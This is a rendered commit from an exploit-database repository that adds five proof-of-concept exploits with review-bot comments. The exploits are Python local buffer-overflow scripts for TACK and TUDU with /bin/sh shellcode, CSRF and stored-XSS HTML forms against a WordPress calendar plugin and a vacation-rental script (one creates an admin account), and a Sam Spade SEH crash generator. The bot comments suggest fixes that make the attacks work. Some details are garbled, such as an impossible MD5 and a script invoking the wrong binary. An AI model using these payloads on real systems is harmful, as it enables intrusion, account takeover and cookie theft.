DB: 2015-11-13

5 new exploits
This commit is contained in:
Offensive Security 2015-11-13 05:03:26 +00:00
parent 26f0706a86
commit 4ab205abc3
6 changed files with 370 additions and 0 deletions


@ -34921,6 +34921,7 @@ id,file,description,date,author,platform,type,port
38641,platforms/multiple/webapps/38641.rb,"JSSE SKIP-TLS Exploit",2015-11-05,"Ramon de C Valle",multiple,webapps,0
38643,platforms/php/webapps/38643.txt,"WordPress Pie Register Plugin 'wp-login.php' Multiple Cross Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0
38646,platforms/jsp/webapps/38646.txt,"NXFilter 3.0.3 - Multiple XSS Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0
38648,platforms/php/webapps/38648.txt,"WordPress My Calendar Plugin 2.4.10 - Multiple Vulnerabilities",2015-11-06,Mysticism,php,webapps,0
38649,platforms/php/webapps/38649.txt,"Google AdWords API PHP client library <= 6.2.0 - Arbitrary PHP Code Execution",2015-11-07,"Dawid Golunski",php,webapps,0
38650,platforms/windows/dos/38650.py,"QNap QVR Client 5.1.0.11290 - Crash PoC",2015-11-07,"Luis Martínez",windows,dos,0
38651,platforms/php/webapps/38651.txt,"eBay Magento CE <= 1.9.2.1 - Unrestricted Cron Script (Potential Code Execution / DoS)",2015-11-07,"Dawid Golunski",php,webapps,0
@ -34941,6 +34942,7 @@ id,file,description,date,author,platform,type,port
38667,platforms/windows/remote/38667.py,"ReadyMedia Remote Heap Buffer Overflow Vulnerability",2013-07-15,"Zachary Cutlip",windows,remote,0
38668,platforms/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption Information Disclosure Vulnerability",2013-07-09,"Brad Antoniewicz",windows,local,0
38669,platforms/multiple/remote/38669.txt,"MongoDB 'conn' Mongo Object Remote Code Execution Vulnerability",2013-06-04,"SCRT Security",multiple,remote,0
38684,platforms/php/webapps/38684.txt,"R-Scripts Vacation Rental Script 7R - Multiple Vulnerabilities",2015-11-12,LiquidWorm,php,webapps,0
38671,platforms/hardware/remote/38671.txt,"Barracuda CudaTel Multiple Cross-Site Scripting Vulnerabilities",2013-07-17,"Benjamin Kunz Mejri",hardware,remote,0
38672,platforms/windows/local/38672.txt,"YardRadius Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local,0
38673,platforms/php/webapps/38673.txt,"Collabtive Multiple Security Vulnerabilities",2013-07-22,"Enrico Cinquini",php,webapps,0
@ -34954,3 +34956,6 @@ id,file,description,date,author,platform,type,port
38681,platforms/linux/local/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,local,0
38682,platforms/php/webapps/38682.txt,"Jahia xCM /engines/manager.jsp site Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0
38683,platforms/php/webapps/38683.txt,"Jahia xCM /administration/ Multiple Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0
38685,platforms/linux/local/38685.py,"TACK 1.07 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,local,0
38686,platforms/linux/local/38686.py,"TUDU 0.82 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,local,0
38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field SEH Overflow",2015-11-12,"Nipun Jaswal",windows,dos,0
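Review bot: The new row `38684,platforms/php/webapps/38684.txt,...` is inserted between 38669 and 38671 in the second hunk, breaking the id ordering that the surrounding rows and the other four additions (38648, 38685–38687) follow. If any downstream tooling assumes the index is sorted by id, that row belongs at the end of the file after 38687. Nothing else in the three hunks looks wrong, though the rendered page has lost the +/- markers, so which row each hunk adds is inferred from the out-of-sequence ids rather than shown.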


platforms/linux/local/38685.py Executable file

@ -0,0 +1,48 @@
# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
# Program: tack - Terminal action checker
# Tested on: GNU/Linux - Kali Linux 2.0 x86
#
# Description: TACK v1.07 and prior is prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: *http://www.z <http://www.rastersoft.com/>nyx.com <http://nyx.com>*
# Kali Linux 2.0 package: pool/main/t/tack/tack_1.07-1_amd64.deb
# MD5: 0fc1d2e9c374c1156b2b02186a9f8980
import os,subprocess
def run():
try:
print "# TACK v1.07 Stack-Based Overflow by Juan Sacco"
print "# It's Fuzzing time on unusable exploits"
print "# This exploit is for educational purposes only"
# Basic structure: JUNK + SHELLCODE + NOPS + EIP
junk = "\x41"*10
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nops = "\x90"*3022
eip = "\x30\xd1\xff\xbf"
subprocess.call(["tack",' ', junk + shellcode + nops + eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "TACK not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Sorry, something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit TACK 1.07 Local Overflow Exploit"
print "Author: Juan Sacco"
except IndexError:
howtousage()
run()
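Review bot: The payload passed to `subprocess.call` places the NOP sled after the shellcode (`junk + shellcode + nops + eip`), so a return address that lands anywhere inside the sled slides forward into the `eip` bytes and off the end of the buffer, never back into the shellcode; unless `0xbfffd130` happens to hit the first shellcode byte exactly, this layout cannot yield the shell the header promises. The conventional order is `junk + nops + shellcode + eip`, with the return address retargeted into the sled. Separately, `howtousage()` calls `sys.exit(-1)` while only `os` and `subprocess` are imported, so that path would raise NameError — it is unreachable today because the `try` around two `print` calls cannot raise IndexError, but the import should still be `import os, subprocess, sys`. The header also cites the `_amd64.deb` package while the shellcode and 4-byte return address are 32-bit; worth confirming the tested target is the i386 build, as the "Tested on" line says x86.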

platforms/linux/local/38686.py Executable file

@ -0,0 +1,48 @@
# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
# Program: tudu - Command line hierarchical ToDo list
# Tested on: GNU/Linux - Kali Linux 2.0 x86
#
# Description: TUDU v0.82 and prior is prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://www.cauterized.net/~meskio/tudu
# Kali Linux 2.0 package: pool/main/t/tudu/tudu_0.8.2-1.deb
# MD5: 1dc2s2e9c374c9876b2b02283a9f5243
import os,subprocess
def run():
try:
print "# TUDU v0.82 Stack-Based Overflow by Juan Sacco"
print "# It's Fuzzing time on unusable exploits"
print "# This exploit is for educational purposes only"
# Basic structure: JUNK + SHELLCODE + NOPS + EIP
junk = "\x41"*10
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nops = "\x90"*124
eip = "\x60\xd3\xff\xbf"
subprocess.call(["tack",' ', junk + shellcode + nops + eip])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "TUDU not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Sorry, something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit TUDU 0.82 Local Overflow Exploit"
print "Author: Juan Sacco"
except IndexError:
howtousage()
run()
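Review bot: `run()` in this TUDU exploit launches `tack`, not `tudu` — the `subprocess.call(["tack", ' ', ...])` line was carried over from 38685.py unchanged, so on a host with tudu installed and tack absent the script prints "TUDU not found!" and never touches the target; it should read `subprocess.call(["tudu", ' ', junk + shellcode + nops + eip])`. The MD5 given in the header (`1dc2s2e9c374c9876b2b02283a9f5243`) contains the non-hex character `s` and cannot be a real digest, so the package reference is unverifiable as written. As in 38685.py, `sys.exit(-1)` is called without `sys` being imported, and the shellcode-before-sled ordering means the hard-coded return address must land on the first shellcode byte exactly rather than anywhere in the sled.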

platforms/php/webapps/38648.txt Executable file

@ -0,0 +1,48 @@
Exploit TItle: My Calendar 2.4.10 CSRF and XSS
Exploit Author : Mysticism (Ahn Sung Jun)
Date : 2015-11-06
Vendor Homepage : http://wordpress.org/plugins/my-calendar
Software Link : https://downloads.wordpress.org/plugin/my-calendar.2.4.10.zip
Version : 2.4.10
Tested On : kail linux Iceweasel
===================
Vulnerable Code : my-calendar-categoris.php
if ( isset( $_POST['mode'] ) && $_POST['mode'] == 'add' ) {
$term = wp_insert_term( $_POST['category_name'], 'mc-event-category' );
if ( ! is_wp_error( $term ) ) {
$term = $term['term_id'];
} else {
$term = false;
}
$add = array(
'category_name' => $_POST['category_name'],
'category_color' => $_POST['category_color'],
'category_icon' => $_POST['category_icon'],
'category_private' => ( ( isset( $_POST['category_private'] ) ) ? 1 : 0 ),
'category_term' => $term
);
}
POC (CSRF & XSS)
<html>
<body onload="javascript:document.forms[0].submit()">
<form id="my-calendar" method="post" action="http://192.168.0.2/wordpress/wp-admin/admin.php?page=my-calendar-categories">
<input type="hidden" name="_wpnonce" value="35ed9ab206"/>
<input type="hidden" name="mode" value="add"/>
<input type="hidden" name="category_id" value="4"/>
<input name="category_name" id="cat_name" type="hidden" class="input" size="30" value="<script>alert(document.cookie)</script>">
<input type="hidden" id="cat_color" name="category_color" class="mc-color-input" size="10" maxlength="7" value=""/>
<input type="hidden" value="on" name="category_private" id="cat_private" />
<input type="hidden" value="on" name="mc_default_category" id="mc_default_category" />
<input type="hidden" value="on" name="mc_skip_holidays_category" id="mc_shc" />
<input type="submit" name="save" class="button-primary" value="Add Category &raquo;"/>
</form>
</html>
Discovered By
Mysticism(Ahn Sung Jun)
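Review bot: The CSRF PoC hard-codes `_wpnonce` as `35ed9ab206`, but a WordPress nonce is bound to the logged-in user and session and expires, so an attacker-controlled page cannot know the victim's value; the CSRF claim therefore only holds if the handler never calls `wp_verify_nonce`/`check_admin_referer`, which the quoted snippet neither shows nor rules out. The advisory should state explicitly that the nonce is not validated (and drop the field from the form to prove it), otherwise what is actually demonstrated is an authenticated stored XSS through `category_name`, which the snippet does show being stored unsanitized. The quoted file name `my-calendar-categoris.php` also looks misspelled against the `page=my-calendar-categories` target in the form — worth checking against the plugin source.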

platforms/php/webapps/38684.txt Executable file

@ -0,0 +1,189 @@

R-Scripts VRS 7R Multiple Stored XSS And CSRF Vulnerabilities
Vendor: R-Scripts
Product web page: http://www.r-scripts.com
Affected version: 7R
Summary: PHP Vacation Rental Script is the best solution
for your vacation rentals online business.
Desc: The application allows users to perform certain actions
via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform
certain actions with administrative privileges if a logged-in
user visits a malicious web site. Stored cross-site scripting
vulnerabilitity was also discovered. The issue is triggered
when input passed via multiple POST parameters is not properly
sanitized before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a
user's browser session in context of an affected site.
Tested on: Apache/2.2.29
PHP/5.3.29
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5274
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5274.php
01.10.2015
--
CSRF Add Admin:
---------------
<html>
<body>
<form action="http://127.0.0.1/admin/users/add" method="POST" enctype="multipart/form-data">
<input type="hidden" name="role" value="admin" />
<input type="hidden" name="username" value="Testingus" />
<input type="hidden" name="password" value="123123" />
<input type="hidden" name="retype&#95;password" value="123123" />
<input type="hidden" name="generate&#95;password&#95;label" value="&#32;Generate&#32;password" />
<input type="hidden" name="name" value="Test" />
<input type="hidden" name="email" value="test&#64;test&#46;tld" />
<input type="hidden" name="phone" value="111111111" />
<input type="hidden" name="phone2" value="&#13;" />
<input type="hidden" name="sms&#95;phone" value="&#13;" />
<input type="hidden" name="sms&#95;active" value="0" />
<input type="hidden" name="fax" value="&#13;" />
<input type="hidden" name="country" value="Uganda" />
<input type="hidden" name="location" value="N" />
<input type="hidden" name="address" value="Address" />
<input type="hidden" name="zip" value="&#13;" />
<input type="hidden" name="active&#95;newsletter" value="0" />
<input type="hidden" name="active" value="1" />
<input type="hidden" name="banned" value="0" />
<input type="hidden" name="ban&#95;reason" value="&#13;" />
<input type="hidden" name="verified&#95;user" value="1" />
<input type="hidden" name="paypal&#95;email" value="&#13;" />
<input type="hidden" name="submitf" value="submit" />
<input type="submit" value="CSRF Add Admin" />
</form>
</body>
</html>
Privilege Escalation:
---------------------
<html>
<body>
<form action="http://127.0.0.1/admin/users/edit/4" method="POST" enctype="multipart/form-data">
<input type="hidden" name="role" value="admin" />
<input type="hidden" name="username" value="member" />
<input type="hidden" name="password" value="&#13;" />
<input type="hidden" name="retype&#95;password" value="&#13;" />
<input type="hidden" name="generate&#95;password&#95;label" value="&#32;Generate&#32;password" />
<input type="hidden" name="name" value="Member" />
<input type="hidden" name="email" value="vrs&#95;owner&#64;vacationrentalscript&#46;com" />
<input type="hidden" name="phone" value="&#13;" />
<input type="hidden" name="phone2" value="&#13;" />
<input type="hidden" name="sms&#95;phone" value="&#13;" />
<input type="hidden" name="sms&#95;active" value="0" />
<input type="hidden" name="fax" value="&#13;" />
<input type="hidden" name="country" value="Germany" />
<input type="hidden" name="location" value="test" />
<input type="hidden" name="address" value="test&#32;address" />
<input type="hidden" name="zip" value="&#13;" />
<input type="hidden" name="active&#95;newsletter" value="1" />
<input type="hidden" name="active" value="1" />
<input type="hidden" name="banned" value="0" />
<input type="hidden" name="ban&#95;reason" value="&#13;" />
<input type="hidden" name="verified&#95;user" value="1" />
<input type="hidden" name="paypal&#95;email" value="sandbox&#95;owner2&#64;vacationrentalscript&#46;com" />
<input type="hidden" name="submitf" value="submit&#95;view" />
<input type="submit" value="Escalate" />
</form>
</body>
</html>
Stored XSS:
-----------
<html>
<body>
<form action="http://127.0.0.1/admin/mail_templates/add" method="POST">
<input type="hidden" name="alias" value='" onmousemove=confirm(1) >' />
<input type="hidden" name="sender&#95;name" value='" onmousemove=confirm(2) >' />
<input type="hidden" name="sender&#95;email" value='" onmousemove=confirm(3) >' />
<input type="hidden" name="bcc&#95;copy" value='" onmousemove=confirm(4) >' />
<input type="hidden" name="subject&#95;1" value='" onmousemove=confirm(5) >' />
<input type="hidden" name="subject&#95;2" value="&#13;" />
<input type="hidden" name="subject&#95;3" value="&#13;" />
<input type="hidden" name="subject&#95;4" value="&#13;" />
<input type="hidden" name="subject&#95;5" value="&#13;" />
<input type="hidden" name="body&#95;1" value="test" />
<input type="hidden" name="body&#95;2" value="&#13;" />
<input type="hidden" name="body&#95;3" value="&#13;" />
<input type="hidden" name="body&#95;4" value="&#13;" />
<input type="hidden" name="body&#95;5" value="&#13;" />
<input type="hidden" name="active" value="1" />
<input type="hidden" name="is&#95;bulk&#95;mail" value="0" />
<input type="hidden" name="submitf" value="submit&#95;view" />
<input type="submit" value="XSS Add Mail" />
</form>
</body>
</html>
Stored XSS:
-----------
<html>
<body>
<form action="http://127.0.0.1/admin/locations/add" method="POST">
<input type="hidden" name="location&#95;selected&#95;id" value="0" />
<input type="hidden" name="temp&#95;lat" value="0" />
<input type="hidden" name="temp&#95;lng" value="0" />
<input type="hidden" name="title&#95;1" value='" onmousemove=confirm(1) >' />
<input type="hidden" name="title&#95;2" value="&#13;" />
<input type="hidden" name="title&#95;3" value="&#13;" />
<input type="hidden" name="title&#95;4" value="&#13;" />
<input type="hidden" name="title&#95;5" value="&#13;" />
<input type="hidden" name="location&#95;parent&#95;id" value="&#45;1" />
<input type="hidden" name="slug&#95;1" value="&#13;" />
<input type="hidden" name="slug&#95;2" value="&#13;" />
<input type="hidden" name="slug&#95;3" value="&#13;" />
<input type="hidden" name="slug&#95;4" value="&#13;" />
<input type="hidden" name="slug&#95;5" value="&#13;" />
<input type="hidden" name="lat" value='" onmousemove=confirm(2) >' />
<input type="hidden" name="lng" value='" onmousemove=confirm(3) >' />
<input type="hidden" name="zip&#95;code" value="&#13;" />
<input type="hidden" name="active" value="1" />
<input type="hidden" name="submitf" value="submit" />
<input type="submit" value="XSS Add Location" />
</form>
</body>
</html>
Stored XSS:
-----------
<html>
<body>
<form action="http://127.0.0.1/admin/coupons/add" method="POST">
<input type="hidden" name="start&#95;date" value="&#13;" />
<input type="hidden" name="start&#95;date&#95;picker" value="&#13;" />
<input type="hidden" name="end&#95;date" value="2015&#45;11&#45;12" />
<input type="hidden" name="end&#95;date&#95;picker" value='" onmousemove=confirm(1) >' />
<input type="hidden" name="title" value='" onmousemove=confirm(2) >' />
<input type="hidden" name="hash" value="RG8AVL" />
<input type="hidden" name="coupon&#95;code" value='" onmousemove=confirm(3) >' />
<input type="hidden" name="discount" value='" onmousemove=confirm(4) >' />
<input type="hidden" name="utimes" value='" onmousemove=confirm(5) >' />
<input type="hidden" name="active" value="1" />
<input type="hidden" name="submitf" value="submit&#95;view" />
<input type="submit" value="XSS Add Coupons" />
</form>
</body>
</html>
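Review bot: The form headed "Privilege Escalation" posts to `/admin/users/edit/4` with `role=admin`, so it is the same admin-session CSRF as the first form, only modifying an existing account instead of creating one; the heading should say so (e.g. `CSRF Role Change (Privilege Escalation of user 4):`), because on its own it reads as if an unprivileged user could elevate themselves. All four PoCs also fill "empty" fields with `&#13;`, which submits a carriage-return byte rather than an empty string — if the application validates those fields the request may be rejected for a reason unrelated to the vulnerability, and plain `value=""` is the safer placeholder. The description asserts the application performs no validity checks on the requests but the PoCs show no evidence that Origin/Referer or a token is ignored, so that claim rests on the author's testing and would be stronger with a one-line statement of what was observed.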

platforms/windows/dos/38687.py Executable file

@ -0,0 +1,32 @@
#!/usr/bin/env python
# Exploit Title : Sam Spade 1.14 S-Lang Command Field SEH Overflow Crash PoC
# Discovery by : Nipun Jaswal
# Email : mail@nipunjaswal.info
# Discovery Date : 12/11/2015
# Vendor Homepage : http://samspade.org
# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version : 1.14
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS : Windows XP Professional SP2 x86 es
# Crash Point : Go to Tools > S-Lang Command> Enter the contents of 'sam_spade_slang_dos.txt' > OK , Note: Do Not Remove the round bracket
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# And the Stack
#00FBFE80 41414141 AAAA
#00FBFE84 41414141 AAAA
#00FBFE88 42424242 BBBB Pointer to next SEH record
#00FBFE8C 43434343 CCCC SE handler
# After the execution of POC, the SEH chain looks like this:
#Address SE handler
#00FBFE88 43434343
#42424242 *** CORRUPT ENTRY ***
f = open("sam_spade_slang_dos.txt", "w")
Junk_a = "A"*528
nseh= "B" * 4
seh= "C" *4
f.write(Junk_a+nseh+seh)
f.close()
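Review bot: The reproduction step in the header says "Do Not Remove the round bracket", but the generated `sam_spade_slang_dos.txt` contains only the A/B/C bytes written on the last lines and no bracket, so a reader cannot tell whether the bracket is pre-filled in the S-Lang command field or should be part of the payload; a comment such as `# the S-Lang command dialog is pre-filled with a bracket — paste the file contents inside it and keep the bracket` (adjusted to what was actually observed) would settle it. The file handling would also be safer as `with open("sam_spade_slang_dos.txt", "w") as f: f.write(Junk_a + nseh + seh)`, which closes the file even if the write fails. The 528-byte offset and the nSEH/SEH placement are specific to the tested 1.14 build on XP SP2, which the header does state, so that is adequate for a crash-only PoC.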